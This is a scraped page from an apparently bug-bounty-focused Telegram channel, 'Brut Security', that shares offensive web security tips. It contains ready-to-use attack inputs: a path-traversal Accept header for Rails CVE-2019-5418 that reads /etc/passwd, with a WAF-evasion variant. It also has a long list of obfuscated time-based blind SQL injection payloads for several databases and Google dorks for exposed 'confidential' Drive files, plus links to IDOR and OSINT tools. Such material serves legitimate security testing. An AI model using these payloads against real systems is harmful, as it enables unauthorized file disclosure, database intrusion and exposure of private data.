Brut Security – Telegram
Brut Security
14.6K subscribers
903 photos
72 videos
287 files
956 links
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Download Telegram
⚠️If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.

Intercept the request in Burp and replace the Accept header with: Accept: ../../../../../../../../../../etc/passwd{{

🛍If the server is deemed to be vulnerable, but a WAF is present:

../../../../../../e*c/p*s*d{{

✔️Credit- nav1n0x
Please open Telegram to view this post
VIEW IN TELEGRAM
143👍15🔥8🫡4🗿2
⚡️Standoff BB Platform- https://dopescope.standoff365.com/
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4🗿3
timebased payloads for different dbms:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
28👍13
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15🐳2🤨2🗿2😁1
🌟One-Liner - Extract all URLs from the Source Code

curl "testphp.vulnweb.com" | grep -oP '(https*://|www\.)[^ ]*'


🔔@0x0SojalSec
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥243👍3👨‍💻3🫡3
⚠️Google Drive Dorks
site:http://drive.google.com inurl:folder
site:http://drive.google.com inurl:open
site:http://docs.google.com inurl:d
site:http://drive.google.com "confidential"
site:http://docs.google.com inurl:d filetype:docx
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥72
👍5🔥5
☄️IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.

🛍https://github.com/errorfiathck/IDOR-Forge
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥176👍4👨‍💻2
Business Logic POC - Able To Unsubscribe User From Company
https://news.1rj.ru/str/brutsecurity_poc/16
11🔥5👍3
Drop Reactions ☕️☕️☕️☕️☕️☕️
Please open Telegram to view this post
VIEW IN TELEGRAM
🫡16🔥101🤨1👨‍💻1
🔔(Bug-Bounty) How to Know You are Ready for Full-Time Bug Bounty

✔️https://chintangurjar.com/posts/full-time-bug-bounty/
Please open Telegram to view this post
VIEW IN TELEGRAM
10🐳4👍1
Authentication Bypass: ⚔️
👍16🔥5
🔖OTP Bypass Via Response Manipulation POC__ P3 - https://news.1rj.ru/str/brutsecurity_poc/17
Please open Telegram to view this post
VIEW IN TELEGRAM
Bystander: Passive Web Vulnerability Detection Tool

https://github.com/itsdivyanshjain/Bystander
👍13🔥3🗿2🐳1🤝1
⚡️⚡️⚡️⚡️Account takeover + OTP Bypass + no rate limit vulnerabilities on same functionality ---> https://news.1rj.ru/str/brutsecurity_poc/18
Please open Telegram to view this post
VIEW IN TELEGRAM
👍75🔥2🤝2
Don't forget to Join the channel and Drop your Reactions!👍
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12🔥8
Brut Security pinned «Don't forget to Join the channel and Drop your Reactions!👍»
🕵️‍♂️ Offensive Google framework.
https://github.com/mxrch/GHunt
👍8🔥4